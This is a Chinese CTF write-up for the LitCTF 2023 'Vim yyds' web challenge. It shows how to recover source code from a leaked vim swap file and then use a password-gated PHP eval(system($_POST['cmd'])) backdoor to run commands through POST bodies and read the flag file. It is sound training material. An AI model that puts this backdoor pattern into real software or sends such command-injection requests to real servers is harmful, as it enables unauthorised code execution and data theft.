【CTF Web】NSSCTF 3864 [LitCTF 2023]Follow me and hack me Writeup(vim泄漏+RCE+源码泄漏)

[LitCTF 2023]Vim yyds

漏…漏了!
Flag形式 NSSCTF{}
出题人 s1rius


解法

dirsearch 扫描目录。找到一个叫 .index.php.swp 的文件,应该是 vim 产生的临时文件。

下载:

http://node4.anna.nssctf.cn:28934/.index.php.swp

直接打开只能看见一堆乱码。

执行:

vim -r index.php.swp

得到网页源码。中间夹了一段 PHP 代码。

<?php
 error_reporting(0);
 $password = "Give_Me_Your_Flag";
 echo "<p>can can need Vim </p>";
 if ($_POST['password'] === base64_encode($password)) {
     echo "<p>Oh You got my password!</p>";
     eval(system($_POST['cmd']));
 }
 ?>

用 DevToys 将

Give_Me_Your_Flag

转换为 base64 编码:

R2l2ZV9NZV9Zb3VyX0ZsYWc=

用 hackbar 发送 POST 请求,请求体:

password=R2l2ZV9NZV9Zb3VyX0ZsYWc=

密码正确。

发送 POST 请求,请求体:

password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cd /;ls

发现 flag。

发送 POST 请求,请求体:

password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag

取得 flag。

Flag

NSSCTF{7b38008e-c387-4384-b342-4008666a5d5b}

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值